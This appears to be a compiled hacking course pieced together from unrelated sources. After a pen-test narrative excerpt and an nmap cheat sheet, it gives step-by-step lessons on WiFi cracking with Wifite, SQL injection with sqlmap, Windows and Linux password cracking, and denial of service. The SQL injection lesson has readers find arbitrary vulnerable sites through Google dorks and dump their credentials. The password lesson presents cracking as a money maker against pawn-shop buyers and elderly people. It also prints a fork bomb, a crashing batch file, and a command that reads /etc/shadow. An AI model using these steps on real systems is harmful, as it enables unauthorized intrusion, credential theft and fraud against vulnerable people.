systems. Occasionally his curiosity took him too far, and Felix was almost swept up in the 1990 Operation
Sundevil prosecutions. Fortunately Felix emerged from adolescence without a criminal record, while retaining
his expert knowledge of security weaknesses. As a professional, he is able to perform the same types of
network intrusions as before, but with the added benefit of contractual immunity from prosecution and even a
paycheck! Rather than keeping his creative exploits secret, he can brag about them to client management
when presenting his reports. So Felix was not disappointed when his boss interrupted his antenna soldering to
announce that the sales department closed a pen-testing deal with the Avatar Online gaming company.
Avatar Online (AO) is a small company working to create the next generation of massive multi-player online
role-playing games (MMORPGs). Their product, inspired by the Metaverse envisioned in Neil
Stevenson's Snow Crash, is fascinating but still highly confidential. After witnessing the high-profile leak of
Valve Software's upcoming game source code, AO quickly hired the security consultants. Felix's task is to
initiate an external (from outside the firewall) vulnerability assessment while his partners work on physical
security, source code auditing, social engineering, and so forth. Felix is permitted to exploit any vulnerabilities
found.
The first step in a vulnerability assessment is network discovery. This reconnaissance stage determines what
IP address ranges the target is using, what hosts are available, what services those hosts are offering, general
network topology details, and what firewall/filtering policies are in effect.
Determining the IP ranges to scan would normally be an elaborate process involving ARIN (or another
geographical registry) lookups, DNS queries and zone transfer attempts, various web sleuthing techniques, and
more. But in this case, Avatar Online explicitly specified what networks they want tested: the corporate network
on 6.209.24.0/24 and their production/DMZ systems residing on 6.207.0.0/22. Felix checks the IP whois
records anyway and confirms that these IP ranges are allocated to AO[1]. Felix subconsciously decodes the
CIDR notation[2] and recognizes this as 1,280 IP addresses. No problem.
Being the careful type, Felix first starts out with what is known as an Nmap list scan (-sL option). This feature
simply enumerates every IP address in the given target netblock(s) and does a reverse-DNS lookup (unless n was specified) on each. One reason to do this first is stealth. The names of the hosts can hint at potential
vulnerabilities and allow for a better understanding of the target network, all without raising alarm bells[3]. Felix
is doing this for another reason—to double-check that the IP ranges are correct. The systems administrator
who provided the IPs might have made a mistake, and scanning the wrong company would be a disaster. The
contract signed with Avatar Online may act as a get-out-of-jail-free card for penetrating their networks, but will
not help if Felix accidentally compromises another company's server! The command he uses and an excerpt of
the results are shown in Example 1.1
felix> nmap -sL 6.209.24.0/24 6.207.0.0/22 Starting Nmap ( http://nmap.org ) Nmap scan report for 6.209.24.0
Nmap scan report for fw.corp.avataronline.com (6.209.24.1)
Nmap scan report for dev2.corp.avataronline.com (6.209.24.2)
Nmap scan report for 6.209.24.3 Nmap scan report for 6.209.24.4 ...
Nmap scan report for dhcp-21.corp.avataronline.com (6.209.24.21)
Nmap scan report for dhcp-22.corp.avataronline.com (6.209.24.22)
Nmap scan report for dhcp-23.corp.avataronline.com (6.209.24.23) ...
Nmap scan report for
6.207.0.0 Nmap scan report for gw.avataronline.com
(6.207.0.1)
Nmap scan report for ns1.avataronline.com (6.207.0.2)
Nmap scan report for ns2.avataronline.com (6.207.0.3)
Nmap scan report for ftp.avataronline.com (6.207.0.4)
Nmap scan report for 6.207.0.5 Nmap scan report for 6.207.0.6
Nmap scan report for www.avataronline.com (6.207.0.7)
Nmap scan report for 6.207.0.8 ... Nmap scan report for cluster-c120.avataronline.com (6.207.2.120)
Nmap scan report for cluster-c121.avataronline.com (6.207.2.121)
Nmap scan report for cluster-c122.avataronline.com (6.207.2.122) ...
Nmap scan report for 6.207.3.255 Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds
felix>
Reading over the results, Felix finds that all of the machines with reverse-DNS entries resolve to Avatar Online.
No other businesses seem to share the IP space. Moreover, these results give Felix a rough idea of how many
machines are in use and a good idea of what many are used for. He is now ready to get a bit more intrusive
and try a port scan. He uses Nmap features that try to determine the application and version number of each
service listening on the network. He also requests that Nmap try to guess the remote operating system via a
series of low-level TCP/IP probes known as OS fingerprinting. This sort of scan is not at all stealthy, but that
does not concern Felix. He is interested in whether the administrators of AO even notice these blatant scans.
After a bit of consideration, Felix settles on the following command:
nmap -sS -p- -PE -PP -PS80,443 -PA3389 -PU40125 -A -T4 -oA avatartcpscan%D 6.209.24.0/24 6.207.0.0/22
Intro – Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was
designed to rapidly scan large networks, although it works fine against single hosts. It uses raw IP packets in
novel ways to determine what hosts are available on the network, what services (application name and version)
those hosts are offering, what operating systems (and OS versions) they are running, what type
of packet filters/firewalls are in use, and dozens of other characteristics. While Network Mapper is
commonly used for security audits, many systems and network administrators find it useful for routine tasks
such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
1. How to open nmap
A. GUI method
Application → Kali Linux → Information gathering → DNS Analysis → nmap
B. open terminal type nmap hit enter
2. Scan a single IP address When firewall OFF/ON on target PC
Syntax – nmap IP address/hostname
EX – nmap 192.168.75.131
Ex- nmap google.com
3. Boost up Your nmap Scan – using this command u can decrease scan time
Syntax – nmap –F IP address
Ex – nmap –F google.com
4. Scan multiple IP address or subnet
A. scan a range of IP address
Syntax – nmap IP address range
EX- nmap 192.168.75.1-131
B. Scan a range of IP address using a wildcard
Ex – nmap 192.168.75.*
C. Scan an entire subnet
Ex – nmap 192.168.75.1/24
5. scan turn on OS and version detection
Ex – nmap –O 192.168.75.131
6. Scan all TCP port in target IP
Ex – nmap –sT 192.168.75.131
7. Scan a firewall for security weakness
A. Null scan – TCP Null Scan to fool a firewall to generate a response
Ex – nmap –sN 192.168.75.131
B. Fin scan – TCP Fin scan to check firewall
Ex – nmap –sF 192.168.75.131
C. TCP Xmas scan to check firewall
Ex – nmap –sX 192.168.75.131
8. UDP Scan – Scan a host for UDP services. This scan is used to view open UDP port.
Ex – nmap –sU 192.168.75.131
9. Scan for IP protocol – This type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.)
are supported by target machines.
Ex – nmap –sO 192.168.75.131
10. detect remote services (server / daemon) version numbers
Ex – nmap –sV 192.168.75.131
11. Find out the most commonly used TCP ports using TCP SYN Scan
A. Stealthy scan
Ex – nmap –sS 192.168.75.131
B. Find out the most commonly used TCP ports using TCP connect scan
Ex – nmap –sT 192.168.75.131
C. Find out the most commonly used TCP ports using TCP ACK scan
Ex – nmap –sA 192.168.75.131
D. Find out the most commonly used TCP ports using TCP Window scan
Ex – nmap –sW 192.168.75.131
E. Find out the most commonly used TCP ports using TCP Maimon scan
Ex – nmap – sM 192.168.75.131
12. List Scan – this command is used tolist target to scan
Ex – nmap –sL 192.168.75.131
13. Host Discovery or Ping Scan – Scan a network and find out which servers and devices are up and running
Ex – nmap –sP 192.168.75.0/24
14. Scan a host when protected by the firewall
Ex – nmap –PN 192.168.75.1
Lesson 6: Wifi Hacking the easy way: Using WIFITE
Wifite
While the aircrack-ng suite is a well known name in the wireless hacking , the same can't be said about Wifite.
Living in the shade of the greatness of established aircrack-ng suite, Wifite has finally made a mark in a field
where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not
independent (eg. it hacks WPS using Reaver), it does what it promises, and puts hacking on autopilot. I'm
listing some features, before I tell you how to use wifite (which I don't think is necessary at all, as anyone who
can understand simple English instructions given by Wifite can use it on his own).
Features Of Wifite
Sorts targets by signal strength (in dB); cracks closest access points first
Automatically de-authenticates clients of hidden networks to reveal SSIDs
Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
Customizable settings (timeouts, packets/sec, etc)"
Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks
are complete
All captured WPA handshakes are backed up to wifite.py's current directory
Smart WPA de-authentication; cycles between all clients and broadcast deauths
Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
Displays session summary at exit; shows any cracked keys
All passwords saved to cracked.txt
Built-in updater: ./wifite.py -upgrade
I find it worth mentioning here, that not only does it hack wifi the easy way, it also hack in the best possible
way.
For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP Method to
speed up data packets.
Hacking WEP network
wifite -wep
You might even have used the command
wifite
The -wep makes it clear to wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when
you think it has scanned enough, you can tell it to stop by typing ctrl+c. It'll then ask you which wifi to hack. In
my case, I didn't specify -wep so it shows all the wifis in range.
You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be
hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets)
within 5 mins. Basically you can except it to hack the wifi in 10 mins approx. Notice how it automatically did the
fake auth and ARP replay.
Here are a few more screenshots of the working of Wifite, from their official website (./wifite.py is not something
that should bother you. You can stick with the simple wifite.
Also, specifying the channel is optional so even the -c 6 was unnecessary. Notice that instead of ARP replay,
the fragmentation attack was used, using -frag)
Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait.
However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you
saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many
other attacks can be played with. A good idea would be to execute the followingwifite -help
This will tell you about the common usage commands, which will be very useful. Here is the list of WEP
commands for different attacksWEP
-wep
only target WEP networks [off]
-pps <num> set the number of packets per second to inject [600]
-wept <sec> sec to wait for each attack, 0 implies endless [600]
-chopchop use chopchop attack
[on]
-arpreplay use arpreplay attack [on]
-fragment use fragmentation attack [on]
-caffelatte use caffe-latte attack [on]
-p0841
use -p0841 attack
[on]
-hirte
use hirte (cfrag) attack [on]
-nofakeauth stop attack if fake authentication fails [off]
-wepca <n> start cracking when number of ivs surpass n [10000]
-wepsave save a copy of .cap files to this directory [off]
Troubleshooting
Wifite quits unexpectedly, sating "Scanning for wireless devices. No wireless interfaces were found. You need
to plug in a wifi device or install drivers. Quitting."
You are using Kali inside a virtual machine most probably. Virtual machine does not support internal wireless
card. Either buy an external wireless card, or do a live boot / side boot with Windows. Anything other than
Virtual machine in general.
Lesson 7: Sql Injection using SQLMap
Disclaimer: using this program on any website without permission is illegal. By reading and/or utilizing this
tutorial you accept sole responsibility for your actions and release Opsec Cybersecurity Solutions LLC and its
employees from any legal liability for your actions.
Sql injection is a way of extracting user login info and other data from unsecure sql databases on companies
servers. It is one of the most common ways sites are hacked.
What is SQLMAP
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL
injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche
features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting,
over data fetching from the database, to accessing the underlying file system and executing commands on the
operating system via out-of-band connections.
Features
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite,
Firebird, Sybase and SAP MaxDB database management systems.
Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION
query, stacked queries and out-of-band.
Support to directly connect to the database without passing via a SQL injection, by providing DBMS
credentials, IP address, port and database name.
Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
Automatic recognition of password hash formats and support for cracking them using a dictionary-based
attack.Support to dump database tables entirely, a range of entries or specific columns as per user’s choice.
The user can also choose to dump only a range of characters from each column’s entry.
Support to search for specific database names, specific tables across all databases or specific columns across
all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials
where relevant columns’ names contain string like name and pass.Support to download and upload any file
from the database server underlying file system when the database software is MySQL, PostgreSQL or
Microsoft SQL Server.
Support to execute arbitrary commands and retrieve their standard output on the database server underlying
operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
Support to establish an out-of-band stateful TCP connection between the attacker machine and the database
server underlying operating system. This channel can be an interactive command prompt, a Meterpreter
session or a graphical user interface (VNC) session as per user’s choice.
Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
[Source: www.sqlmap.org]
Step 1: Find a Vulnerable Website
This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google
Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in
Google. Just copy paste any of the lines in Google and Google will show you a number of search results.
Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
You can google a list of google dork strings
Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
For every google dork string, you will get huundreds of search results. How do you know which is really
vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is
best but to me the following is the simplest and most conclusive.
Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark ' at the end of the URL. (Just to ensure, " is a double quotation mark and ' is a
single quotation mark).
So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to
a different page, move on to the next site in your Google search results page.
See example error below in the screenshot. I’ve obscured everything including URL and page design for
obvious reasons.
Examples of SQLi Errors from Different Databases and Languages
Microsoft SQL Server
Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.
Description: An unhanded exception occurred during the execution of the current web request. Please review
the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string
‘attack;’.
MySQL Errors
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version
for the right syntax to use near ‘’’ at line 12
Oracle Errors
java.sql.SQLException: ORA-00933: SQL command not properly ended at
oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated
PostgreSQL Errors
Query failed: ERROR: unterminated quoted string at or near “‘’’”
Step 2: List DBMS databases using SQLMAP SQL Injection
As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I
need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns).
As I am using SQLMAP, it will also tell me which one is vulnerable.
Run the following command on your vulnerable website with.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15″)
--dbs = Enumerate DBMS databases
This commands reveals quite a few interesting info:
web application technology: Apache back-end DBMS: MySQL 5.0 [10:55:53] [INFO] retrieved:
information_schema [10:55:56] [INFO] retrieved: sqldummywebsite [10:55:56] [INFO] fetched data logged to
text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two database that we can look into. information_schema is a standard database for almost
every MYSQL database. So our interest would be on sqldummywebsitedatabase.
Step 3: List tables of target database using SQLMAP SQL Injection
Now we need to know how many tables this sqldummywebsite database got and what are their names. To find
out that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database got 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite' [10:56:22] [INFO] heuristics detected web
page charset 'ISO-8859-2' [10:56:22] [INFO] the SQL query used returns 8 entries [10:56:25] [INFO] retrieved:
item [10:56:27] [INFO] retrieved: link [10:56:30] [INFO] retrieved: other [10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag [10:56:37] [INFO] retrieved: popular_picture [10:56:39] [INFO]
retrieved: popular_tag [10:56:42] [INFO] retrieved: user_info
and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table
probably contains username and passwords.
Step 4: List columns on target table of selected database using SQLMAP SQL Injection
Now we need to list all the columns on target table user_info of sqldummywebsitedatabase using SQLMAP
SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -columns
This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite' [10:57:18] [INFO]
heuristics detected web page charset 'ISO-8859-2' [10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id [10:57:22] [INFO] retrieved: int(10) unsigned [10:57:25] [INFO] retrieved:
user_login [10:57:27] [INFO] retrieved: varchar(45) [10:57:32] [INFO] retrieved: user_password [10:57:34]
[INFO] retrieved: varchar(255) [10:57:37] [INFO] retrieved: unique_id [10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status [10:57:43] [INFO] retrieved: tinyint(4)
AHA! This is exactly what we are looking for … target table user_login and user_password.
Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL
Injection
SQLMAP SQL Injection makes is Easy! Just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C
user_login --dump
Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX [10:58:40] [INFO] analyzing table dump for possible password hashes
Almost there, we now only need the password to for this user.. Next shows just that..
Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL
Injection
You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to
extract password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C
user_password --dump
TADA!! We have password.
[10:59:15] [INFO] the SQL query used returns 1 entries [10:59:17] [INFO] retrieved: 24iYBc17xK0e. [10:59:18]
[INFO] analyzing table dump for possible password hashes Database: sqldummywebsite Table: user_info [1
entry] +---------------+ | user_password | +---------------+ | 24iYBc17xK0e. | +---------------+
But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their
website vulnerable like that just can’t have a password like that.
That is exactly right. This is a hashed password. What that means, the password is encrypted and now we
need to decrypt it
Step 7: Cracking password
So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that?
Step 7.a: Identify Hash type
Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command
line type in the following command and on prompt paste the hash value:
hash-identifier
Excellent. So this is DES(Unix) hash.
Step 7.b: Crack HASH using cudahashcat
First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES
So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.
I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my
laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or
VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in
Hard Disk. Instructions are in the website, search around.
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt
Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu).
However both cudaHashcat and oclHashcat found and cracked the key.
Anyhow, so here’s the cracked password: abc123.
24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.
Lesson 8: Cracking Windows Passwords in Kali Linux
This is probably your number one money maker. Pawn shops whos computer forfeited out and need to be sold,
to citizens and old people who are just ditzy. Enjoy.
Crack and Reset the system password locally using Kali
Insert the USB Live CD and Boot your PC. Make sure the Boot from USB is the first option in the Boot menu at
BIOS.
Boot Windows machine with the LiveCD. On the boot menu of Kali Linux, select Live (forensic mode). Kali
Linux initialize and when it loads, it will open a terminal window and navigate to the Windows password
database file
Crack the Windows password with ophcrack:
After loading Live kali linux go to the system menu > ophcrack click ok
Ophcrack uses Rainbow Tables to crack NTLM and LM hashes into plain text, its a free Windows password
cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of
the method. If you have a complex password it will take a lot longer than simple passwords, and with the free
tables your password may never be cracked.
Once the crack is done you will see the password in plain text, write it down and reboot the machine to login. If
your password isn’t cracked, you can also log in as one of the other users with admin rights and then change
your password from within Windows.
With the free tables available you will not be able to crack every password, but the paid tables range from $100
to $1000.Windows uses NTLM hashes to encrypt the password file which gets stored in SAM file. We simply
need to target this file to retrieve the password
Now you can see the ophcrack application windows. Here, click on Load > Encrypted SAM
After that we need to give the path to SAM directory which is by default /mnt/hda1/WINDOWS/System32 click
choose
Here we can see the saved hashed now with the username and userid.
Now click on Crack button and wait for the password. Its quick and easy
That’s it. It’ll show the password , if you unsuccessfully go with free tables. I downloaded the xp free small and
the Vista free tables. Once you have downloaded the tables you will need to unzip them in separate folders. I
made a folder called “hash-tables” and then made 2 more folders within for each table to unzip to.
Run the program and click on “Tables” button. Select the table you downloaded and click “Install”, navigate to
the folder where you unzipped the table, select it and then click “ok.” You should see green lights next to the
tables you installed.
Reset Windows password with chntpw:
Navigate to the Windows password database file. Almost all versions of windows password is saved in SAM
file. This file is usually located under /Windows/System32/config. On your system it may look something like
this: /media/hda1/Windows/System32/config.
The SAM database is usually in the /media/name_of_hard_drive/Windows/System32/config
Type command chntpw -l SAM and it will list out all the usernames that are contained on the Windows system.
#chntpw -l SAM
The command gives us a list of usernames on the system. When we have the username we want to modify
and we simply run the command chntpw -u “username” SAM
In the example below we typed: chntpw -u “Sanjai sathish” SAM and we get the following menu:
#chntpw -u Sanjai sathish
We now have the option of clearing the password, changing the password, or promoting the user to
administrator. Changing the password does not always work on Windows 7,8 systems. it may works on XP
system, so it is recommended to clear the password. Therefore you will be able to log in with a blank password.
You can also promote the user to a local administrator as well.
Crack the password in Linux using John the ripper:
John the Ripper is a fast password cracker, Its primary purpose is to detect weak Unix passwords. Besides
several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box
are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version
John the ripper is a popular dictionary based password cracking tool. It uses a wordlist full of passwords and
then tries to crack a given password hash using each of the password from the wordlist. In other words its
called brute force password cracking and is the most basic form of password cracking. It is also the most time
and cpu consuming technique. More the passwords to try, more the time required.
But still if you want to crack a password locally on your system then john is one of the good tools to try. John is
in the top 10 security tools in Kali linux.
In this topic i am going to show you, how to use the unshadow command along with john to crack the password
of users on a linux system. On linux the username/password details are stored in the following 2 files
#/etc/passwd
#/etc/shadow
The actual password hash is stored in /etc/shadow and this file is accessible on with root access to the
machine. So try to get this file from your own linux system. Or first create a new user with a simple password. I
will create a new user on my linux system named happy, with password chess.
Now that our new user is already created its time to crack his password.
#unshadow
The unshadow command will basically combine the data of /etc/passwd and /etc/shadow to create 1 file with
username and password details. Usage is quite simple.
#unshadow /etc/passwd /etc/shadow > ~/crack
We redirected the output of unshadow command to a new file called crack.
Now this new file shall be cracked by john. For the wordlist we shall be using the password list that comes with
john on kali linux. It is located at the following path /usr/share/john/password.lst or you can use your own
password lists too.
#john –wordlist=/usr/share/john/password.lst ~/crack
Use the “–show” option to display all of the cracked passwords reliably
So in the above command john was able to crack the hash and get us the password “chess” for the user
“happy”. Now john was able to crack, only because the password “chess” was present in the password list. If it
were not there then john would have failed.
Use the show option to list all the cracked passwords.
#john –show ~/crack
Just like most other things associated with hacking, a denial of service attack is not
everyone's cup of tea. It, however, can be understood if explained properly. In this
tutorial, I'll try to give you a big picture of denial of service attacks, before I start
using geeky terms like packets and all that. We'll start at the easiest point.
What effect does a denial of service attack have
Wireless hacking usually gives you the password of a wireless network. A man in the
middle attack lets you spy on network traffic. Exploiting a vulnerability and sending a
payload gives you access and control over the target machine. What exactly does a
Denial of Service (DOS) attack do? Basically, it robs the legitimate owner of a
resource from the right to use it. I mean if I successfully perform a DOS on your
machine, you won't be able to use it anymore. In the modern scenario, it is used to
disrupt online services. Many hacktivist groups (internet activists who use hacking as
a form of active resistance - a name worth mentioning here is Anonymous) do a
Distributed Denial of service attack on government and private websites to make them
listen to the people's opinion (the legitimacy of this method of dictating your opinion
has been a topic of debate, and a lot of hactivists had to suffer jailtime for
participating in DDOS). So basically it's just what its name suggests, Denial Of
Service.
Basic Concept
It uses the fact that while a service can be more than sufficient to cater to the demands
of the desired users, a drastic increase in unwelcome users can make the service go
down. Most of us use the words like "This website was down the other day" without
any idea what it actually means. Well now you do. To give you a good idea of what is
happening, I'll take the example from the movie "We Are Legion".
Scenario One : Multiplayer online game
Now consider you are playing an online multi-player game. There are millions of
other people who also play this game. Now there's a pool in the game that everyone
likes to visit. Now you and your friends know that they have the power of numbers.
There are a lot of you, and together you decide to make identical characters in the
game. And then all of you go and block the access to the pool. You just carried out a
denial of service attack. The users of the game have now been deprived of a service
which they had obtained the right to use when they signed up for the game. This is
just what the guys at 4chan (birthplace and residence of Anonymous) did a long time
ago. This is the kind of thing that gives you a very basic idea what a denial of service
attack can be.
They made a Swastika and blocked access to the pool
Scenario 2 : Bus stop
Now assume that due to some reason, you want to disrupt the bus service of your city
and stop the people from using the service. To stop the legitimate people from
utilizing this service, you can call your friends to unnecessarily use it. Basically you
can invite millions of friends to come and crowd around all the bus stops and take the
buses without any purpose. Practically it is not feasible since you don't have millions
of friends, and they are definitely not wasting their time and money riding aimlessly
from one place to another.
So while this may seem impossible in the real world, in the virtual world, you can
cause as much load as a thousand (or even a million) users alone at the click of a
button. There are many tools out there for this purpose, however, you are not
recommended to use them as a DOS on someone else is illegal, and easy to
detect (Knock, knock. It's the police). We will, come back to this later, and do a DOS
on our own computer.
How denial of service attacks are carried out
Basically, when you visit a website, you send them a request to deliver their content to
you. What you send is a packet. Basically, it take more than just one packet, you need
a lot of them. But still, the bandwidth that you consume in requesting the server to
send you some data is very little. In return, the data they send you is huge. This takes
up server resources, for which they pay for. A legitimate view can easily earn more
than the server costs on account of advertisements, etc. So, companies buy server that
can provide enough data transfer for its regular users. However, if the number of users
suddenly increases, the server gives up. It goes down. And since the company knows
it under DOS, it just turns off the server, so that it does not have to waste its monetary
resources on a DOS, and wait till the DOS stops. Now with the modern computers and
bandwidth, we alone can easily pretend to be a thousand or even more users at once.
While this is not good for the server, it is not something that can make it succumb
(your computer is not the only thing that gets better with time, the servers do too).
However, if a lot of people like you do a DOS attack, it becomes a distributed denial
of service attack. This can easily be fatal for a server. It's just like you go to a page,
and start refreshing it very fast, maybe a thousand times every second. And you are
not the only one. There are thousand others that are doing the same thing. So basically
you guys are equivalent to more than a million users using the site simultaneously,
and that's not something the server can take. Sites like Google and Facebook have
stronger servers, and algorithms that can easily identify a DOS and block the traffic
from that IP. But it's not just the websites that get better, and the black hat hackers too
are improving every day. This leaves a huge scope for understanding DOS attacks and
becoming an asset to one of these sides ( the good, the bad and the ugly).
A Live DOS on your Kali Machine
We are going to execute a command in the Kali linux terminal that will cripple the
operating system and make it hand. It will most probably work on other linux
distributions too.
Warning : This code will freeze Kali linux, and most probably it will not recover from
the shock. You'll lose any unsaved data. You will have to restart the machine the hard
way (turn of the virtual machine directly or cut the power supply if its a real machine).
Just copy paste the code and your computer is gone.
:(){ :|:& };:
The machine froze right after I pressed enter. I had to power it off from the Vmware
interface.
What basically happened is that the one line command asked the operating system to
keep opening process very fast for an infinite period of time. It just gave up.
Here's something for the Windows Users
Crashing Windows Using Batch file
Open a notepad. Put the following code in it:1
Start
goto 1
Save the file as name.bat
Bat here is batch file extension. Run it. Game over.
It basically executes the second line, and the third line makes it go over to the first,
execute the second, and then over to first again, execute the second..... infinitely. So
again, denial of service. All the processing power is used by a useless command,
while you, the legitimate user, can't do anything.
Lesson 10: Introduction to Python
Python is a very diverse programming language and is excellent to learn, today at codingsec we will run
through an introductory tutorial to get you more familiar with how the fundamentals of the language works. The
best way to learn to code is to actually put what you read today in to practice!
##Python is easy to learn print(“Hello, World!”)
Installing Python
In order to get started on learning Python, you will need to install the required software.For Python
programming you need a working Python installation and a text editor.
To download the required software please http://www.python.org/download you will find numerous download
links there. Python is very diverse and compatible what ever operating system you are using.
LINUX, BSD, AND UNIX USERS
You are probably lucky and Python is already installed on your machine. To test it typepython3 on a
command line. If you see something like that in the following section, you are set.
If you have to install Python, first try to use the operating system’s package manager or go to the repository
where your packages are available and get Python 3. Python 3.0 was released in December 2008; all the
distributions should have Python 3 available, so you may not need to compile Python 3 from scratch after
downloading the source code. Ubuntu and Fedora do have Python 3 binary packages available, but they are
not yet the default, so they need to be installed specially.
Roughly, here are the steps to compile Python in UNIX
Download the .tgz file (use your Web browser to get the gzipped tar file
fromhttps://www.python.org/downloads/release/python-341)Uncompress the tar file (put in the correct path to
where you downloaded it):$ tar -xvzf ~/Download/Python-3.4.1.tgz <i>... list of files as they are uncompressed
</i>Change to the directory and tell the computer to compile and install the program$ cd Python-3.4/ $
./configure --prefix=$HOME/python3_install <i> ... lots of output. Watch for error messages here ... </i> $ make
<i> ... even more output. Hopefully no error messages ... </i> $ make installAdd python 3 to your path. You can
test it first by specifying the full path. You should add $HOME/python3_install/bin to your PATH bash variable.$
~/python3_install/bin/python3 Python 3.4.1 (... size and date information ...) [GCC 4.5.2] on linux2 Type "help",
"copyright", "credits" or "license" for more information. &gt;&gt;&gt;
The above commands will install Python 3 to your home directory, which is probably what you want, but if you
skip the --prefix, it will install it to /usr/local. If you want to use the IDLE graphical code editor, you
need to make sure that the tk and tcl libraries, together with their development files, are installed on the
system. You will get a warning during the make phase if these are not available.
MAC USERS
Starting from Mac OS X (Tiger), Python ships by default with the operating system, but you will need to update
to Python 3 until OS X starts including Python 3 (check the version by starting python3 in a command line
terminal). Also IDLE (the Python editor) might be missing in the standard installation. If you want to (re-)install
Python, get the MacOS installer from the Python download site.
WINDOWS USERS
Download the appropriate Windows installer (the x86 MSI installer, if you do not have a 64-bit AMD or Intel
chip). Start the installer by double-clicking it and follow the prompts.
See https://docs.python.org/3/using/windows.html#installing-python for more information.
CONFIGURING YOUR PATH ENVIRONMENT VARIABLE
The PATH environment variable is a list of folders, separated by semicolons, in which Windows will look for a
program whenever you try to execute one by typing its name at a Command Prompt. You can see the current
value of your PATH by typing this command at a Command Prompt:
echo %PATH%
The easiest way to permanently change environment variables is to bring up the built-in environment variable
editor in Windows. How you get to this editor is slightly different on different versions of Windows.
On Windows 8: Press the Windows key and type Control Panel to locate the Windows Control Panel.
Once you’ve opened the Control Panel, select View by: Large Icons, then click on System. In the window that
pops up, click the Advanced System Settings link, then click the Environment
Variables... button.
